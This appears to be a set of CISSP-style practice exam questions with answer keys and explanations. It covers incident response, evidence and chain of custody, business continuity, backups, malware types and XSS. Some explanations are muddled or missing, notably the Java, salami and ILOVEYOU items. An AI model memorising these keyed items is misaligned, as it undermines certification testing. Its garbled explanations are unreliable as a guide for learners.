When first analyzing an intrusion that has just been detected and confirming that it is a true positive, which of the following actions should be done as a first step if you wish to prosecute the attacker in court?
Back up the compromised systems.
Identify the attacks used to gain access.
Capture and record system information.
Isolate the compromised systems.
When an intrusion has been detected and confirmed, if you wish to prosecute the attacker in court, the following actions should be performed in the following order:
Capture and record system information and evidence that may be lost, modified, or not captured during the execution of a backup procedure. Start with the most volative memory areas first.
Make at least two full backups of the compromised systems, using hardware-write-protectable or write-once media. A first backup may be used to re-install the compromised system for further analysis and the second one should be preserved in a secure location to preserve the chain of custody of evidence.
Isolate the compromised systems.
Search for signs of intrusions on other systems.
Examine logs in order to gather more information and better identify other systems to which the intruder might have gained access.
Search through logs of compromised systems for information that would reveal the kind of attacks used to gain access.
Identify what the intruder did, for example by analyzing various log files, comparing checksums of known, trusted files to those on the compromised machine and by using other intrusion analysis tools.
Regardless of the exact steps being followed, if you wish to prosecute in a court of law it means you MUST capture the evidence as a first step before it could be lost or contaminated. You always start with the most volatile evidence first.
NOTE:
I have received feedback saying that some other steps may be done such as Disconnecting the system from the network or shutting down the system. This is true. However, those are not choices listed within the 4 choices attached to this question, you MUST avoid changing the question. You must stick to the four choices presented and pick which one is the best out of the four presented.
In real life, Forensic is not always black or white. There are many shades of grey. In real life you would have to consult your system policy (if you have one), get your Computer Incident team involved, and talk to your forensic expert and then decide what is the best course of action.
Reference(s) Used for this question:
http://www.newyorkcomputerforensics.com/learn/forensics_process.php
and
ALLEN, Julia H., The CERT Guide to System and Network Security Practices, Addison-Wesley, 2001, Chapter 7: Responding to Intrusions (pages 273-277).
After a company is out of an emergency state, what should be moved back to the original site first?
Executives
Least critical components
IT support staff
Most critical components
This will expose any weaknesses in the plan and ensure the primary site has been properly repaired before moving back. Moving critical assets first may induce a second disaster if the primary site has not been repaired properly.
The first group to go back would test items such as connectivity, HVAC, power, water, improper procedures, and/or steps that has been overlooked or not done properly. By moving these first, and fixing any problems identified, the critical operations of the company are not negatively affected.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 9: Disaster Recovery and Business continuity (page 621).
Which of the following categories of hackers poses the greatest threat?
Disgruntled employees
Student hackers
Criminal hackers
Corporate spies
According to the authors, hackers fall in these categories, in increasing threat order: security experts, students, underemployed adults, criminal hackers, corporate spies and disgruntled employees.
Disgruntled employees are the most dangerous security problem of all because they are most likely to have a good knowledge of the organization's IT systems and security measures.
Source: STREBE, Matthew and PERKINS, Charles, Firewalls 24seven, Sybex 2000, Chapter 2: Hackers.
Which of the following tasks is NOT usually part of a Business Impact Analysis (BIA)?
Calculate the risk for each different business function.
Identify the company’s critical business functions.
Calculate how long these functions can survive without these resources.
Develop a mission statement.
The Business Impact Analysis is critical for the development of a business continuity plan (BCP). It identifies risks, critical processes and resources needed in case of recovery and quantifies the impact a disaster will have upon the organization. The development of a mission statement is normally performed before the BIA.
A BIA (business impact analysis ) is considered a functional analysis, in which a team collects data through interviews and documentary sources; documents business functions, activities, and transactions ; develops a hierarchy of business functions; and finally applies a classification scheme to indicate each individual function’s criticality level.
BIA Steps
The more detailed and granular steps of a BIA are outlined here:
1. Select individuals to interview for data gathering.
2. Create data-gathering techniques (surveys, questionnaires, qualitative and quantitative approaches).
3. Identify the company’s critical business functions.
4. Identify the resources these functions depend upon.
5. Calculate how long these functions can survive without these resources.
6. Identify vulnerabilities and threats to these functions.
7. Calculate the risk for each different business function.
8. Document findings and report them to management.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Location 21076). Auerbach Publications. Kindle Edition.
and
Harris, Shon (2012-10-18). CISSP All-in-One Exam Guide, 6th Edition (p. 905-910). McGraw-Hill. Kindle Edition.
In the statement below, fill in the blank:
Law enforcement agencies must get a warrant to search and seize an individual's property, as stated in the _____ Amendment.
First.
Second.
Third.
Fourth.
The Fourth Amendment does not apply to a seizure or an arrest by private citizens.
Search and seizure activities can get tricky depending on what is being searched for and where.
For example, American citizens are protected by the Fourth Amendment against unlawful search and seizure, so law enforcement agencies must have probable cause and request a search warrant from a judge or court before conducting such a search.
The actual search can only take place in the areas outlined by the warrant. The Fourth Amendment does not apply to actions by private citizens unless they are acting as police agents. So, for example, if Kristy’s boss warned all employees that the management could remove files from their computers at any time, and her boss was not a police officer or acting as a police agent, she could not successfully claim that her Fourth Amendment rights were violated. Kristy’s boss may have violated some specific privacy laws, but he did not violate Kristy’s Fourth Amendment rights.
In some circumstances, a law enforcement agent may seize evidence that is not included in the warrant, such as if the suspect tries to destroy the evidence. In other words, if there is an impending possibility that evidence might be destroyed, law enforcement may quickly seize the evidence to prevent its destruction. This is referred to as exigent circumstances, and a judge will later decide whether the seizure was proper and legal before allowing the evidence to be admitted. For example, if a police officer had a search warrant that allowed him to search a suspect’s living room but no other rooms, and then he saw the suspect dumping cocaine down the toilet, the police officer could seize the cocaine even though it was in a room not covered under his search warrant. After evidence is gathered, the chain of custody needs to be enacted and enforced to make sure the evidence’s integrity is not compromised.
All other choices were only detractors.
Reference(s) used for this question:
Harris, Shon (2012-10-25). CISSP All-in-One Exam Guide, 6th Edition (p. 1057). McGraw-Hill. Kindle Edition.
Which backup type run at regular intervals would take the least time to complete?
Full Backup
Differential Backup
Incremental Backup
Disk Mirroring
Incremental backups only backup changed data (changes archive bit to not backup again if not changed).
Although the incremental backup is fastest to backup, it is usually more time consuming for the restore process.
In some cases, the window available for backup may not be long enough to backup all the data on the system during each backup. In that case, differential or incremental backups may be more appropriate.
In an incremental backup, only the files that changed since the last backup will be backed up.
In a differential backup, only the files that changed since the last full backup will be backed up.
In general, differentials require more space than incremental backups while incremental backups are faster to perform. On the other hand, restoring data from incremental backups requires more time than differential backups. To restore from incremental backups, the last full backup and all of the incremental backups performed are combined. In contrast, restoring from a differential backup requires only the last full backup and the latest differential.
The following are incorrect answers:
Differential backups backup all data since the last full backup (does not reset archive bit)
Full backups backup all selected data, regardless of archive bit, and resets the archive bit.
Disk mirroring is not considered as a backup type.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 20385-20390). Auerbach Publications. Kindle Edition.
and
HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 9: Disaster Recovery and Business continuity (page 618).
Which of the following best defines a Computer Security Incident Response Team (CSIRT)?
An organization that provides a secure channel for receiving reports about suspected security incidents.
An organization that ensures that security incidents are reported to the authorities.
An organization that coordinates and supports the response to security incidents.
An organization that disseminates incident-related information to its constituency and other involved parties.
RFC 2828 (Internet Security Glossary) defines a Computer Security Incident Response Team (CSIRT) as an organization that coordinates and supports the response to security incidents that involves sites within a defined constituency. This is the proper definition for the CSIRT. To be considered a CSIRT, an organization must provide a secure channel for receiving reports about suspected security incidents, provide assistance to members of its constituency in handling the incidents and disseminate incident-related information to its constituency and other involved parties. Security-related incidents do not necessarily have to be reported to the authorities.
Source: SHIREY, Robert W., RFC2828: Internet Security Glossary, may 2000.
What is called the probability that a threat to an information system will materialize?
Threat
Risk
Vulnerability
Hole
The Answer: Risk: The potential for harm or loss to an information system or network; the probability that a threat will materialize.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Pages 16, 32.
In order to be able to successfully prosecute an intruder:
A point of contact should be designated to be responsible for communicating with law enforcement and other external agencies.
A proper chain of custody of evidence has to be preserved.
Collection of evidence has to be done following predefined procedures.
Whenever possible, analyze a replica of the compromised resource, not the original, thereby avoiding inadvertently tamping with evidence.
If you intend on prosecuting an intruder, evidence has to be collected in a lawful manner and, most importantly, protected through a secure chain-of-custody procedure that tracks who has been involved in handling the evidence and where it has been stored. All other choices are all important points, but not the best answer, since no prosecution is possible without a proper, provable chain of custody of evidence.
Source: ALLEN, Julia H., The CERT Guide to System and Network Security Practices, Addison-Wesley, 2001, Chapter 7: Responding to Intrusions (pages 282-285).
What is electronic vaulting?
Information is backed up to tape on a hourly basis and is stored in a on-site vault.
Information is backed up to tape on a daily basis and is stored in a on-site vault.
Transferring electronic journals or transaction logs to an off-site storage facility
A transfer of bulk information to a remote central backup facility.
Electronic vaulting is defined as "a method of transferring bulk information to off-site facilities for backup purposes". Remote Journaling is the same concept as electronic vaulting, but has to do with journals and transaction logs, not the actual files.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 9: Disaster Recovery and Business continuity (page 619).
During the salvage of the Local Area Network and Servers, which of the following steps would normally be performed first?
Damage mitigation
Install LAN communications network and servers
Assess damage to LAN and servers
Recover equipment
The first activity in every recovery plan is damage assessment, immediately followed by damage mitigation.
This first activity would typically include assessing the damage to all network and server components (including cables, boards, file servers, workstations, printers, network equipment), making a list of all items to be repaired or replaced, selecting appropriate vendors and relaying findings to Emergency Management Team.
Following damage mitigation, equipment can be recovered and LAN communications network and servers can be reinstalled.
Source: BARNES, James C. & ROTHSTEIN, Philip J., A Guide to Business Continuity Planning, John Wiley & Sons, 2001 (page 135).
A copy of evidence or oral description of its contents; which is not as reliable as best evidence is what type of evidence?
Direct evidence
Circumstantial evidence
Hearsay evidence
Secondary evidence
Secondary evidence is a copy of evidence or oral description of its contents; not as reliable as best evidence
Here are other types of evidence:
Best evidence — original or primary evidence rather than a copy of duplicate of the evidence
Direct evidence — proves or disproves a specific act through oral testimony based on information gathered through the witness’s five senses
Conclusive evidence — incontrovertible; overrides all other evidence
Opinions — two types: Expert — may offer an opinion based on personal expertise and facts, Non-expert — may testify only as to facts
Circumstantial evidence — inference of information from other, immediate, relevant facts
Corroborative evidence — supporting evidence used to help prove an idea or point; used as a supplementary tool to help prove a primary piece of evidence
Hearsay evidence (3rdparty) — oral or written evidence that is presented in court that is second hand and has no firsthand proof of accuracy or reliability
(i) Usually not admissible in court
(ii) Computer generated records and other business records are in hearsay category
(iii) Certain exceptions to hearsay rule:
(1) Made during the regular conduct of business and authenticated by witnesses familiar with their use
(2) Relied upon in the regular course of business
(3) Made by a person with knowledge of records
(4) Made by a person with information transmitted by a person with knowledge
(5) Made at or near the time of occurrence of the act being investigated
(6) In the custody of the witness on a regular basis
Which one of the following is NOT one of the outcomes of a vulnerability assessment?
Quantative loss assessment
Qualitative loss assessment
Formal approval of BCP scope and initiation document
Defining critical support areas
When seeking to determine the security position of an organization, the security professional will eventually turn to a vulnerability assessment to help identify specific areas of weakness that need to be addressed. A vulnerability assessment is the use of various tools and analysis methodologies to determine where a particular system or process may be susceptible to attack or misuse. Most vulnerability assessments concentrate on technical vulnerabilities in systems or applications, but the assessment process is equally as effective when examining physical or administrative business processes.
The vulnerability assessment is often part of a BIA. It is similar to a Risk Assessment in that there is a quantitative (financial) section and a qualitative (operational) section. It differs in that i t is smaller than a full risk assessment and is focused on providing information that is used solely for the business continuity plan or disaster recovery plan.
A function of a vulnerability assessment is to conduct a loss impact analysis. Because there will be two parts to the assessment, a financial assessment and an operational assessment, it will be necessary to define loss criteria both quantitatively and qualitatively.
Quantitative loss criteria may be defined as follows:
Incurring financial losses from loss of revenue, capital expenditure, or personal liability resolution
The additional operational expenses incurred due to the disruptive event
Incurring financial loss from resolution of violation of contract agreements
Incurring financial loss from resolution of violation of regulatory or compliance requirements
Qualitative loss criteria may consist of the following:
The loss of competitive advantage or market share
The loss of public confidence or credibility, or incurring public mbarrassment
During the vulnerability assessment, critical support areas must be defined in order to assess the impact of a disruptive event. A critical support area is defined as a business unit or function that must be present to sustain continuity of the business processes, maintain life safety, or avoid public relations embarrassment.
Critical support areas could include the following:
Telecommunications, data communications, or information technology areas
Physical infrastructure or plant facilities, transportation services
Accounting, payroll, transaction processing, customer service, purchasing
The granular elements of these critical support areas will also need to be identified. By granular elements we mean the personnel, resources, and services the critical support areas need to maintain business continuity
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 4628-4632). Auerbach Publications. Kindle Edition.
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Page 277.
The scope and focus of the Business continuity plan development depends most on:
Directives of Senior Management
Business Impact Analysis (BIA)
Scope and Plan Initiation
Skills of BCP committee
SearchStorage.com Definitions mentions "As part of a disaster recovery plan, BIA is likely to identify costs linked to failures, such as loss of cash flow, replacement of equipment, salaries paid to catch up with a backlog of work, loss of profits, and so on.
A BIA report quantifies the importance of business components and suggests appropriate fund allocation for measures to protect them. The possibilities of failures are likely to be assessed in terms of their impacts on safety, finances, marketing, legal compliance, and quality assurance.
Where possible, impact is expressed monetarily for purposes of comparison. For example, a business may spend three times as much on marketing in the wake of a disaster to rebuild customer confidence."
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Page 278.
Once evidence is seized, a law enforcement officer should emphasize which of the following?
Chain of command
Chain of custody
Chain of control
Chain of communications
All people that handle the evidence from the time the crime was committed through the final disposition must be identified. This is to ensure that the evidence can be used and has not been tampered with.
The following answers are incorrect:
chain of command. Is incorrect because chain of command is the order of authority and does not apply to evidence.
chain of control. Is incorrect because it is a distractor.
chain of communications. Is incorrect because it is a distractor.
Under United States law, an investigator's notebook may be used in court in which of the following scenarios?
When the investigator is unwilling to testify.
When other forms of physical evidence are not available.
To refresh the investigators memory while testifying.
If the defense has no objections.
An investigator's notebook cannot be used as evidence is court. It can only be used by the investigator to refresh his memory during a proceeding, but cannot be submitted as evidence in any form.
The following answers are incorrect:
When the investigator is unwilling to testify. Is incorrect because the notebook cannot be submitted as evidence in any form.
When other forms of physical evidence are not available. Is incorrect because the notebook cannot be submitted as evidence in any form.
If the defense has no objections. Is incorrect because the notebook cannot be submitted as evidence in any form.
Which of the following steps should be one of the first step performed in a Business Impact Analysis (BIA)?
Identify all CRITICAL business units within the organization.
Evaluate the impact of disruptive events.
Estimate the Recovery Time Objectives (RTO).
Identify and Prioritize Critical Organization Functions
Project Initiation and Management
This is the first step in building the Business Continuity program is project initiation and management. During this phase, the following activities will occur:
Obtain senior management support to go forward with the project
Define a project scope, the objectives to be achieved, and the planning assumptions
Estimate the project resources needed to be successful, both human resources and financial resources
Define a timeline and major deliverables of the project In this phase, the program will be managed like a project, and a project manager should be assigned to the BC and DR domain.
The next step in the planning process is to have the planning team perform a BIA. The BIA will help the company decide what needs to be recovered, and how quickly. Mission functions are typically designated with terms such as critical, essential, supporting and nonessential to help determine the appropriate prioritization.
One of the first steps of a BIA is to Identify and Prioritize Critical Organization Functions. All organizational functions and the technology that supports them need to be classified based on their recovery priority. Recovery time frames for organization operations are driven by the consequences of not performing the function. The consequences may be the result of organization lost during the down period; contractual commitments not met resulting in fines or lawsuits, lost goodwill with customers.
All other answers are incorrect.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 21073-21075). Auerbach Publications. Kindle Edition.
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 20697-20710). Auerbach Publications. Kindle Edition.
The absence of a safeguard, or a weakness in a system that may possibly be exploited is called a(n)?
Threat
Exposure
Vulnerability
Risk
A vulnerability is a weakness in a system that can be exploited by a threat.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 237.
Java is not:
Object-oriented.
Distributed.
Architecture Specific.
Multithreaded.
JAVA was developed so that the same program could be executed on multiple hardware and operating system platforms, it is not Architecture Specific.
The following answers are incorrect:
Object-oriented. Is not correct because JAVA is object-oriented. It should use the object-oriented programming methodology.
Distributed. Is incorrect because JAVA was developed to be able to be distrubuted, run on multiple computer systems over a network.
Multithreaded. Is incorrect because JAVA is multi-threaded that is calls to subroutines as is the case with object-oriented programming.
A virus is a program that can replicate itself on a system but not necessarily spread itself by network connections.
What best describes a scenario when an employee has been shaving off pennies from multiple accounts and depositing the funds into his own bank account?
Data fiddling
Data diddling
Salami techniques
Trojan horses
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2001, Page 644.
The high availability of multiple all-inclusive, easy-to-use hacking tools that do NOT require much technical knowledge has brought a growth in the number of which type of attackers?
Black hats
White hats
Script kiddies
Phreakers
As script kiddies are low to moderately skilled hackers using available scripts and tools to easily launch attacks against victims.
The other answers are incorrect because :
Black hats is incorrect as they are malicious , skilled hackers.
White hats is incorrect as they are security professionals.
Phreakers is incorrect as they are telephone/PBX (private branch exchange) hackers.
Reference : Shon Harris AIO v3 , Chapter 12: Operations security , Page : 830
Which of the following virus types changes some of its characteristics as it spreads?
Boot Sector
Parasitic
Stealth
Polymorphic
A Polymorphic virus produces varied but operational copies of itself in hopes of evading anti-virus software.
The following answers are incorrect:
boot sector. Is incorrect because it is not the best answer. A boot sector virus attacks the boot sector of a drive. It describes the type of attack of the virus and not the characteristics of its composition.
parasitic. Is incorrect because it is not the best answer. A parasitic virus attaches itself to other files but does not change its characteristics.
stealth. Is incorrect because it is not the best answer. A stealth virus attempts to hide changes of the affected files but not itself.
Virus scanning and content inspection of SMIME encrypted e-mail without doing any further processing is:
Not possible
Only possible with key recovery scheme of all user keys
It is possible only if X509 Version 3 certificates are used
It is possible only by "brute force" decryption
Content security measures presumes that the content is available in cleartext on the central mail server.
Encrypted emails have to be decrypted before it can be filtered (e.g. to detect viruses), so you need the decryption key on the central "crypto mail server".
There are several ways for such key management, e.g. by message or key recovery methods. However, that would certainly require further processing in order to achieve such goal.
Which virus category has the capability of changing its own code, making it harder to detect by anti-virus software?
Stealth viruses
Polymorphic viruses
Trojan horses
Logic bombs
A polymorphic virus has the capability of changing its own code, enabling it to have many different variants, making it harder to detect by anti-virus software. The particularity of a stealth virus is that it tries to hide its presence after infecting a system. A Trojan horse is a set of unauthorized instructions that are added to or replacing a legitimate program. A logic bomb is a set of instructions that is initiated when a specific event occurs.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 11: Application and System Development (page 786).
Which of the following technologies is a target of XSS or CSS (Cross-Site Scripting) attacks?
Web Applications
Intrusion Detection Systems
Firewalls
DNS Servers
XSS or Cross-Site Scripting is a threat to web applications where malicious code is placed on a website that attacks the use using their existing authenticated session status.
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.
Mitigation:
Configure your IPS - Intrusion Prevention System to detect and suppress this traffic.
Input Validation on the web application to normalize inputted data.
Set web apps to bind session cookies to the IP Address of the legitimate user and only permit that IP Address to use that cookie.
See the XSS (Cross Site Scripting) Prevention Cheat Sheet
See the Abridged XSS Prevention Cheat Sheet
See the DOM based XSS Prevention Cheat Sheet
See the OWASP Development Guide article on Phishing.
See the OWASP Development Guide article on Data Validation.
The following answers are incorrect:
Intrusion Detection Systems: Sorry. IDS Systems aren't usually the target of XSS attacks but a properly-configured IDS/IPS can "detect and report on malicious string and suppress the TCP connection in an attempt to mitigate the threat.
Firewalls: Sorry. Firewalls aren't usually the target of XSS attacks.
DNS Servers: Same as above, DNS Servers aren't usually targeted in XSS attacks but they play a key role in the domain name resolution in the XSS attack process.
The following reference(s) was used to create this question:
CCCure Holistic Security+ CBT and Curriculum
and
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
In computing what is the name of a non-self-replicating type of malware program containing malicious code that appears to have some useful purpose but also contains code that has a malicious or harmful purpose imbedded in it, when executed, carries out actions that are unknown to the person installing it, typically causing loss or theft of data, and possible system harm.
virus
worm
Trojan horse.
trapdoor
A trojan horse is any code that appears to have some useful purpose but also contains code that has a malicious or harmful purpose imbedded in it. A Trojan often also includes a trapdoor as a means to gain access to a computer system bypassing security controls.
Wikipedia defines it as:
A Trojan horse, or Trojan, in computing is a non-self-replicating type of malware program containing malicious code that, when executed, carries out actions determined by the nature of the Trojan, typically causing loss or theft of data, and possible system harm. The term is derived from the story of the wooden horse used to trick defenders of Troy into taking concealed warriors into their city in ancient Greece, because computer Trojans often employ a form of social engineering, presenting themselves as routine, useful, or interesting in order to persuade victims to install them on their computers.
The following answers are incorrect:
virus. Is incorrect because a Virus is a malicious program and is does not appear to be harmless, it's sole purpose is malicious intent often doing damage to a system. A computer virus is a type of malware that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected".
worm. Is incorrect because a Worm is similiar to a Virus but does not require user intervention to execute. Rather than doing damage to the system, worms tend to self-propagate and devour the resources of a system. A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike a computer virus, it does not need to attach itself to an existing program. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.
trapdoor. Is incorrect because a trapdoor is a means to bypass security by hiding an entry point into a system. Trojan Horses often have a trapdoor imbedded in them.
References:
http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29
and
http://en.wikipedia.org/wiki/Computer_virus
and
http://en.wikipedia.org/wiki/Computer_worm
and
http://en.wikipedia.org/wiki/Backdoor_%28computing%29
Which of the following computer crime is MORE often associated with INSIDERS?
IP spoofing
Password sniffing
Data diddling
Denial of service (DOS)
It refers to the alteration of the existing data , most often seen before it is entered into an application.This type of crime is extremely common and can be prevented by using appropriate access controls and proper segregation of duties. It will more likely be perpetrated by insiders, who have access to data before it is processed.
The other answers are incorrect because :
IP Spoofing is not correct as the questions asks about the crime associated with the insiders. Spoofing is generally accomplished from the outside.
Password sniffing is also not the BEST answer as it requires a lot of technical knowledge in understanding the encryption and decryption process.
Denial of service (DOS) is also incorrect as most Denial of service attacks occur over the internet.
Reference : Shon Harris , AIO v3 , Chapter-10 : Law , Investigation & Ethics , Page : 758-760.
Crackers today are MOST often motivated by their desire to:
Help the community in securing their networks.
Seeing how far their skills will take them.
Getting recognition for their actions.
Gaining Money or Financial Gains.
A few years ago the best choice for this question would have been seeing how far their skills can take them. Today this has changed greatly, most crimes committed are financially motivated.
Profit is the most widespread motive behind all cybercrimes and, indeed, most crimes- everyone wants to make money. Hacking for money or for free services includes a smorgasbord of crimes such as embezzlement, corporate espionage and being a “hacker for hire”. Scams are easier to undertake but the likelihood of success is much lower. Money-seekers come from any lifestyle but those with persuasive skills make better con artists in the same way as those who are exceptionally tech-savvy make better “hacks for hire”.
"White hats" are the security specialists (as opposed to Black Hats) interested in helping the community in securing their networks. They will test systems and network with the owner authorization.
A Black Hat is someone who uses his skills for offensive purpose. They do not seek authorization before they attempt to comprise the security mechanisms in place.
"Grey Hats" are people who sometimes work as a White hat and other times they will work as a "Black Hat", they have not made up their mind yet as to which side they prefer to be.
The following are incorrect answers:
All the other choices could be possible reasons but the best one today is really for financial gains.
References used for this question:
http://library.thinkquest.org/04oct/00460/crimeMotives.html
and
http://www.informit.com/articles/article.aspx?p=1160835
and
http://www.aic.gov.au/documents/1/B/A/%7B1BA0F612-613A-494D-B6C5-06938FE8BB53%7Dhtcb006.pdf
What do the ILOVEYOU and Melissa virus attacks have in common?
They are both denial-of-service (DOS) attacks.
They have nothing in common.
They are both masquerading attacks.
They are both social engineering attacks.
While a masquerading attack can be considered a type of social engineering, the Melissa and ILOVEYOU viruses are examples of masquerading attacks, even if it may cause some kind of denial of service due to the web server being flooded with messages. In this case, the receiver confidently opens a message coming from a trusted individual, only to find that the message was sent using the trusted party's identity.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, Chapter 10: Law, Investigation, and Ethics (page 650).
What is malware that can spread itself over open network connections?
Worm
Rootkit
Adware
Logic Bomb
Computer worms are also known as Network Mobile Code, or a virus-like bit of code that can replicate itself over a network, infecting adjacent computers.
A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike a computer virus, it does not need to attach itself to an existing program. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.
A notable example is the SQL Slammer computer worm that spread globally in ten minutes on January 25, 2003. I myself came to work that day as a software tester and found all my SQL servers infected and actively trying to infect other computers on the test network.
A patch had been released a year prior by Microsoft and if systems were not patched and exposed to a 376 byte UDP packet from an infected host then system would become compromised.
Ordinarily, infected computers are not to be trusted and must be rebuilt from scratch but the vulnerability could be mitigated by replacing a single vulnerable dll called sqlsort.dll.
Replacing that with the patched version completely disabled the worm which really illustrates to us the importance of actively patching our systems against such network mobile code.
The following answers are incorrect:
- Rootkit: Sorry, this isn't correct because a rootkit isn't ordinarily classified as network mobile code like a worm is. This isn't to say that a rootkit couldn't be included in a worm, just that a rootkit isn't usually classified like a worm. A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer. The term rootkit is a concatenation of "root" (the traditional name of the privileged account on Unix operating systems) and the word "kit" (which refers to the software components that implement the tool). The term "rootkit" has negative connotations through its association with malware.
- Adware: Incorrect answer. Sorry but adware isn't usually classified as a worm. Adware, or advertising-supported software, is any software package which automatically renders advertisements in order to generate revenue for its author. The advertisements may be in the user interface of the software or on a screen presented to the user during the installation process. The functions may be designed to analyze which Internet sites the user visits and to present advertising pertinent to the types of goods or services featured there. The term is sometimes used to refer to software that displays unwanted advertisements.
- Logic Bomb: Logic bombs like adware or rootkits could be spread by worms if they exploit the right service and gain root or admin access on a computer.
The following reference(s) was used to create this question:
The CCCure CompTIA Holistic Security+ Tutorial and CBT
and
http://en.wikipedia.org/wiki/Rootkit
and
http://en.wikipedia.org/wiki/Computer_worm
and
http://en.wikipedia.org/wiki/Adware